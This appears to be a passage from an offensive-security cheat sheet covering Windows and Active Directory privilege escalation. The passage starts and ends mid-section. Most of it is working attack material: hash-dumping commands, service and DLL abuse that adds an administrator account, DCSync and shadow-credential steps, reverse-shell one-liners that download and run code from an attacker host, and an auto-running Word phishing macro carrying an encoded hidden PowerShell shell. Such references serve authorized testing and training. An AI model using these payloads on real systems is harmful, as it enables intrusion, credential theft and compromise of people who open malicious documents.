SYSTEM Hashes ```cmd reg save hklm\system C:\Users\<USERNAME>\system.hive reg save hklm\sam C:\Users\<USERNAME>\sam.hive ``` ###### Dumping Hashes ```shell impacket-secretsdump -sam sam.hive -system system.hive LOCAL ``` ```shell pypykatz registry --sam sam.hive system.hive ``` ###### SeBackupPrivilege Privilege Escalation (diskshadow) > https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug ###### Script for PowerShell Environment ```cmd SET CONTEXT PERSISTENT NOWRITERSp add volume c: alias foobarp createp expose %foobar% z:p ``` ```cmd diskshadow /s <FILE>.txt ``` ###### Copy ntds.dit ```cmd Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit ``` ###### Export System Registry Value ```cmd reg save HKLM\SYSTEM c:\temp\system ``` ###### Extract the Hashes ```shell impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL ``` ###### Alternative Way via Robocopy ```cmd reg save hklm\sam C:\temp\sam reg save hklm\system C:\temp\system ``` ```cmd set metadata C:\Windows\temp\meta.cabX set context clientaccessibleX set context persistentX begin backupX add volume C: alias cdriveX createX expose %cdrive% E:X end backupX ``` ```cmd diskshadow /s script.txt robocopy /b E:\Windows\ntds . ntds.dit ``` ```shell impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL ``` ###### SeLoadDriverPrivilege ```cmd sc.exe query $services=(get-service).name | foreach {(Get-ServiceAcl $_) | where {$_.access.IdentityReference -match 'Server Operators'}} ``` ```cmd sc.exe config VSS binpath="C:\temp\nc64.exe -e cmd <LHOST> <LPORT>" sc.exe stop VSS sc.exe start VSS ``` ###### SeTakeOwnershipPrivilege ```cmd takeown /f C:\Windows\System32\Utilman.exe ``` ```cmd icacls C:\Windows\System32\Utilman.exe /grant Everyone:F ``` ```cmd C:\Windows\System32\> copy cmd.exe utilman.exe ``` Click the `Ease of Access` button on the logon screen to get a shell with `NT Authority\System` privileges. ###### SeImpersonate and SeAssignPrimaryToken Privilege > https://github.com/antonioCoco/RogueWinRM ```cmd .\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>" ``` ##### DLL Hijacking ###### Standard Search Order 1. The directory from which the application loaded. 2. The system directory. 3. The 16-bit system directory. 4. The Windows directory. 5. The current directory. 6. The directories that are listed in the PATH environment variable. ```cmd Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} icacls .\PATH\TO\BINARY\<BINARY>.exe Restart-Service <SERVICE> $env:path ``` ###### DLL Abuse ###### customdll.cpp ```cpp #include <stdlib.h> #include <windows.h> BOOL APIENTRY DllMain( HANDLE hModule,// Handle to DLL module DWORD ul_reason_for_call,// Reason for calling function LPVOID lpReserved ) // Reserved { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACH: // A process is loading the DLL. int i; i = system ("net user <USERNAME> <PASSWORD> /add"); i = system ("net localgroup administrators <USERNAME> /add"); break; case DLL_THREAD_ATTACH: // A process is creating a new thread. break; case DLL_THREAD_DETACH: // A thread exits normally. break; case DLL_PROCESS_DETACH: // A process unloads the DLL. break; } return TRUE; } ``` ###### Compiling customdll.cpp ```shell x86_64-w64-mingw32-gcc customdll.cpp --shared -o customdll.dll ``` Copy the `.dll` file to the desired path. ```cmd Restart-Service <SERVICE> Get-LocalGroupMember administrators ``` ##### Leveraging Windows Services ###### Running Services Enumeration ```cmd Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} ``` ###### Service Configuration Enumeration ```cmd Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<SERVICE>'} ``` ###### Permission Table | Mask | Permissions | | --- | --- | | F | Full access | | M | Modify access | | RX | Read and execute access | | R | Read-only access | | W | Write-only access | ###### Permission Enumeration ```cmd icacls "C:\PATH\TO\BINARY\<BINARY>" ``` ###### Permissions Abuse ###### adduser.c ```c #include <stdlib.h> int main () { int i; i = system ("net user <USERNAME> <PASSWORD> /add"); i = system ("net localgroup administrators <USERNAME> /add"); return 0; } ``` ###### Compiling ```shell x86_64-w64-mingw32-gcc adduser.c -o adduser.exe ``` ###### Execution ```cmd net stop <SERVICE> net start <SERVICE> ``` or ```cmd shutdown /r /t 0 Get-LocalGroupMember administrators ``` ###### PowerView Example ```cmd powershell -ep bypass . .\PowerUp.ps1 Get-ModifiableServiceFile Install-ServiceBinary -Name '<SERVICE>' ``` ###### Service Execution Properties Enumeration ```cmd $ModifiableFiles = echo 'C:\PATH\TO\BINARY\<BINARY>.exe' | Get-ModifiablePath -Literal $ModifiableFiles $ModifiableFiles = echo 'C:\PATH\TO\BINARY\<BINARY>.exe argument' | Get-ModifiablePath -Literal $ModifiableFiles $ModifiableFiles = echo 'C:\PATH\TO\BINARY\<BINARY>.exe argument -conf=C:\temp\path' | Get-ModifiablePath -Literal $ModifiableFiles ``` ##### Unquoted Service Paths ###### Search Order ```shell C:\example.exe C:\Program Files\example.exe C:\Program Files\my example\example.exe C:\Program Files\my example\my example\example.exe ``` ###### Service Path Enumeration Place a `.exe` file in the desired folder, then `start` or `restart` the `service`. ```cmd Get-CimInstance -ClassName win32_service | Select Name,State,PathName wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """ Start-Service <SERVICE> Stop-Service <SERVICE> icacls "C:\" icacls "C:\Program Files" icacls "C:\Program Files\my example" Start-Service <SERVICE> Get-LocalGroupMember administrators ``` ###### PowerView Example ```cmd powershell -ep bypass . .\PowerUp.ps1 Get-UnquotedService Write-ServiceBinary -Name '<SERVICE>' -Path "C:\Program Files\my example\example.exe" Start-Service <SERVICE> Get-LocalGroupMember administrators ``` ##### Scheduled Tasks Enumeration Place a `.exe` file in the desired folder and wait for the `scheduled task` to get `executed`. ```cmd schtasks /query /fo LIST /v icacls C:\PATH\TO\BINARY\<BINARY>.exe Get-LocalGroupMember administrators ``` ##### writeDACL > https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/ ```cmd $SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword) Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync ``` #### PassTheCert > https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html > https://github.com/AlmondOffSec/PassTheCert/tree/main/Python ```shell certipy-ad cert -pfx <CERTIFICATE>.pfx -nokey -out <CERTIFICATE>.crt certipy-ad cert -pfx <CERTIFICATE>.pfx -nocert -out <CERTIFICATE>.key python3 passthecert.py -domain '<DOMAIN>' -dc-host '<DOMAIN>' -action 'modify_user' -target '<USERNAME>' -new-pass '<PASSWORD>' -crt ./<CERTIFICATE>.crt -key ./<CERTIFICATE>.key evil-winrm -i '<RHOST>' -u '<USERNAME>' -p '<PASSWORD>' ``` #### Penelope ```shell F12 // Detach shell and go to Main Menu i <SESSION> // Interact with a session ``` ```shell ┍┽ penelope ┾┑ > run peass_ng // Run the latest version of PEASS-ng in the background ┍┽ penelope ┾┑ > run lse // Run the latest version of linux-smart-enumeration in the background ┍┽ penelope ┾┑ > run meterpreter // Get a meterpreter shell ┍┽ penelope ┾┑ > download /etc // Download the remote /etc folder ┍┽ penelope ┾┑ > upload https://www.exploit-db.com/exploits/40847 // Upload an exploit to the remote machine ┍┽ penelope ┾┑ > upload <FOLDER> // Upload a local folder to the remote machine ``` #### PKINITtools ```shell python3 gettgtpkinit.py -cert-pfx <USERNAME>.pfx -dc-ip <RHOST> <DOMAIN>/<USERNAME> <USERNAME>.ccache export KRB5CCNAME=<USERNAME>.ccache python3 getnthash.py <DOMAIN>/<USERNAME> -key 6617cde50b7ee63faeb6790e84981c746efa66f68a1cc3a394bbd27dceaf0554 ``` ##### Fixing socket ssl wrapping error: [Errno 104] Connection reset by peer Error > https://takraw-s.medium.com/fix-errors-socket-ssl-wrapping-error-errno-104-connection-reset-by-peer-9c63c551cd7 > https://github.com/fortra/impacket/issues/581 ```shell sudo vi /etc/ssl/openssl.cnf ``` change ```shell [system_default_sect] MinProtocol = TLSv1.2 CipherString = DEFAULT:@SECLEVEL=2 ``` to ```shell [system_default_sect] MinProtocol = TLSv1.0 CipherString = DEFAULT:@SECLEVEL=1 ``` Alternatively you can create your own `openssl.cnf` and `export` the path to it. ```shell $ export OPENSSL_CONF=/PATH/TO/FOLDER/openssl.cnf ``` #### Port Scanning ```shell for i in $(seq 1 254); do nc -zv -w 1 <XXX.XXX.XXX>.$i <RPORT>; done ``` ```shell export ip=<RHOST>; for port in $(seq 1 65535); do timeout 0.01 bash -c "</dev/tcp/$ip/$port && echo The port $port is open || echo The Port $port is closed > /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done ``` #### powercat ```cmd powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1'); powercat -c <LHOST> -p <LPORT> -e powershell" ``` #### Powermad ```cmd Import-Module ./Powermad.ps1 $secureString = convertto-securestring "<PASSWORD>" -asplaintext -force New-MachineAccount -MachineAccount <NAME> -Domain <DOMAIN> -DomainController <DOMAIN> -Password $secureString ``` #### PowerShell ##### Common Commands ```cmd whoami /all getuserid systeminfo Get-Process net users net users <USERNAME> Get-ADUser -Filter * -SearchBase "DC=<DOMAIN>,DC=<DOMAIN>" Get-Content <FILE> Get-ChildItem . -Force GCI -hidden type <FILE> | findstr /l <STRING> [convert]::ToBase64String((Get-Content -path "<FILE>" -Encoding byte)) ``` ##### Allow Script Execution ```cmd Set-ExecutionPolicy remotesigned Set-ExecutionPolicy unrestricted ``` ##### Script Execution Bypass ```cmd powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1 ``` ##### Import Module to PowerShell cmdlet ```cmd Import-Module .\<FILE> ``` ##### Check PowerShell Versions ```cmd Set-ExecutionPolicy Unrestricted powershell -Command "$PSVersionTable.PSVersion" powershell -c "[Environment]::Is64BitProcess" ``` ##### Read PowerShell History ```cmd type C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` ##### Base64 Encoding using pwsh ```cmd pwsh $Text = '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) $EncodedText =[Convert]::ToBase64String($Bytes) $EncodedText ``` ##### Create a .zip File ```cmd Compress-Archive -LiteralPath C:\PATH\TO\FOLDER\<FOLDER> -DestinationPath C:\PATH\TO\FILE<FILE>.zip ``` ##### Unzip a File ```cmd Expand-Archive -Force <FILE>.zip ``` ##### Start a new Process ```cmd Start-Process -FilePath "C:\nc64.exe" -ArgumentList "<LHOST> <LPORT> -e powershell" ``` ##### Invoke-Expression / Invoke-WebRequest ```cmd IEX(IWR http://<LHOST>/<FILE>.ps1) Invoke-Expression (Invoke-WebRequest http://<LHOST/<FILE>.ps1) ``` ##### .NET Reflection ```cmd $bytes = (Invoke-WebRequest "http://<LHOST>/<FILE>.exe" -UseBasicParsing ).Content $assembly = [System.Reflection.Assembly]::Load($bytes) $entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic') $entryPointMethod.Invoke($null, (, [string[]] ('find', '/<COMMAND>'))) ``` ##### Switching Sessions in PowerShell ```cmd $password = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $password) Enter-PSSession -ComputerName <RHOST> -Credential $cred ``` or ```cmd $SecurePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $SecurePassword) $Session = New-PSSession -Credential $Cred Invoke-Command -Session $session -scriptblock { whoami } ``` or ```cmd $username = '<USERNAME>' $password = '<PASSWORD>' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Process powershell.exe -Credential $credential ``` ```cmd powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *" ``` ##### Add new Domain Administrator ```cmd $PASSWORD= ConvertTo-SecureString –AsPlainText -Force -String <PASSWORD> New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD Add-ADGroupMember -Identity "Domain Admins" -Member <USERNAME> ``` ##### Execute Commands in User Context ```cmd $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force $cred = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $pass) Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami} ``` ##### Execute Scripts with Credentials (Reverse Shell) ```cmd $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass) Invoke-Command -Computer <RHOST> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred ``` #### PrivescCheck ```cmd Set-ExecutionPolicy Bypass -Scope Process -Force . .\PrivescCheck.ps1 ``` ```cmd Get-Content .\PrivescCheck.ps1 | Out-String | Invoke-Expression powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML" powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML" ``` #### pwncat ```shell (local) pwncat$ back // get back to shell Ctrl+d // get back to pwncat shell ``` ```shell pwncat-cs -lp <LPORT> (local) pwncat$ download /PATH/TO/FILE/<FILE> . (local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE> ``` #### rpcclient ```shell rpcclient -U "" <RHOST> ``` ```shell dsr_getdcname dsr_getdcnameex dsr_getdcnameex2 dsr_getsitename enumdata enumdomgroups enumdomusers enumjobs enumports enumprivs getanydcname getdcname lookupsids lsaenumsid <SID> lsaquery netconnenum netdiskenum netfileenum netsessenum netshareenum netshareenumall netsharegetinfo queryuser <USERNAME> srvinfo ``` #### Rubeus ##### Common Commands ```cmd .\Rubeus.exe dump /nowrap .\Rubeus.exe asreproast /nowrap .\Rubeus.exe asreproast /outfile:hashes.asreproast .\Rubeus.exe kerberoast /nowrap .\Rubeus.exe kerberoast /outfile:hashes.kerberoast ``` ##### Request a Delegation Ticket ```cmd .\Rubeus.exe tgtdeleg /nowrap ``` ##### Overpass the Hash ```cmd .\Rubeus.exe kerberoast /user:<USERNAME> ``` ##### Pass the Hash ```cmd .\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials ``` #### RunasCs ```cmd .\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT> .\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT> --bypass-uac .\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT> --bypass-uac -l 5 -b .\RunasCs.exe <USERNAME> <PASSWORD> <FILE> --bypass-uac -l 5 -b .\RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT> .\RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>' ``` #### Seatbelt ```cmd .\Seatbelt.exe -group=system .\Seatbelt.exe -group=all .\Seatbelt.exe -group=all -full ``` #### Shadow Credentials ```shell python3 pywhisker.py -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' --target '<OBJECT>' --action 'list' ``` ```shell python3 pywhisker.py -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' --target '<OBJECT>' --action 'info' --device-id <ID> ``` ```shell python3 pywhisker.py -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' --target '<OBJECT>' --action 'add' --filename <OBJECT> ``` ```shell python3 gettgtpkinit.py <DOMAIN>/<USERNAME> -cert-pfx <USERNAME>.pfx -pfx-pass '<PASSWORD>' <USERNAME>.ccache ``` ```shell export KRB5CCNAME=<USERNAME>.ccache ``` ```shell python3 getnthash.py <DOMAIN>/<USERNAME> -key <KEY> ``` ```shell pth-net rpc password '<USERNAME>' '<PASSWORD>' -U '<DOMAIN>'/'<USERNAME>'%'<HASH>':'<HASH>' -S '<RHOST>' ``` or ```shell python3 dacledit.py -action 'write' -rights 'FullControl' -principal '<USERNAME>' -target-dn 'CN=<GROUP>,CN=<GROUP>,DC=<DOMAIN>,DC=<DOMAIN>' '<DOMAIN>/<USERNAME>:<PASSWORD>' ``` ```shell net rpc group addmem '<GROUP>' '<USERNAME>' -U '<DOMAIN>'/'<USERNAME>'%'<PASSWORD>' -S '<RHOST>' ``` ```shell bloodyAD --host <RHOST> -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' get object <GROUP> --attr member ``` ```shell python3 pywhisker.py -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' --target '<OBJECT>' --action 'list' ``` ```shell python3 pywhisker.py -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' --target '<OBJECT>' --action 'info' --device-id <ID> ``` ```shell python3 pywhisker.py -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' --target '<OBJECT>' --action 'add' --filename <OBJECT> ``` ```shell python3 gettgtpkinit.py <DOMAIN>/<USERNAME> -cert-pfx <USERNAME>.pfx -pfx-pass '<PASSWORD>' <USERNAME>.ccache ``` ```shell export KRB5CCNAME=<USERNAME>.ccache ``` ```shell python3 getnthash.py <DOMAIN>/<USERNAME> -key <KEY> ``` ```shell pth-net rpc password '<USERNAME>' '<PASSWORD>' -U '<DOMAIN>'/'<USERNAME>'%'<HASH>':'<HASH>' -S '<RHOST>' ``` #### smbpasswd ```shell smbpasswd -r <RHOST> -U <USERNAME> ``` #### winexe ```shell winexe -U '<USERNAME%PASSWORD>' //<RHOST> cmd.exe winexe -U '<USERNAME%PASSWORD>' --system //<RHOST> cmd.exe ``` ### Social Engineering Tools #### Microsoft Office Word Phishing Macro ##### Payload ```cmd IEX(New-Object System.Net.WebClient).DownloadString("http://<LHOST>/powercat.ps1"); powercat -c <LHOST> -p <LPORT> -e powershell ``` or ```cmd powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1'); powercat -c <LHOST> -p <LPORT> -e powershell" ``` or ```cmd $client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ##### Encoding > https://www.base64decode.org/ Now `Base64 encode` it with `UTF-16LE` and `LF (Unix)`. ```shell JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== ``` ###### Alternatively using pwsh ```shell $ pwsh $Text = '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) $EncodedText =[Convert]::ToBase64String($Bytes) $EncodedText ``` ##### Python Script for Formatting ```shell str = "powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" n = 50 for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"') ``` ```shell $ python3 script.py Str = Str + "powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4Ad" Str = Str + "AAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdAB" Str = Str + "lAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDA" Str = Str + "GwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADE" Str = Str + "ANwAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAP" Str = Str + "QAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQA" Str = Str + "oACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9A" Str = Str + "CAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGw" Str = Str + "AZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAY" Str = Str + "QBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQB" Str = Str + "zAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7A" Str = Str + "CQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQ" Str = Str + "AIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AV" Str = Str + "ABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQA" Str = Str + "uAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwA" Str = Str + "CwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACg" Str = Str + "AaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8Ad" Str = Str + "QB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQB" Str = Str + "jAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiA" Str = Str + "FAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACs" Str = Str + "AIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAK" Str = Str + "ABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQB" Str = Str + "TAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuA" Str = Str + "GQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGk" Str = Str + "AdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAb" Str = Str + "gBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgB" Str = Str + "lAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuA" Str = Str + "HQALgBDAGwAbwBzAGUAKAApAA==" ``` ##### Final Macro ```shell Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4Ad" Str = Str + "AAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdAB" Str = Str + "lAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDA" Str = Str + "GwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADE" Str = Str + "ANwAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAP" Str = Str + "QAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQA" Str = Str + "oACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9A" Str = Str + 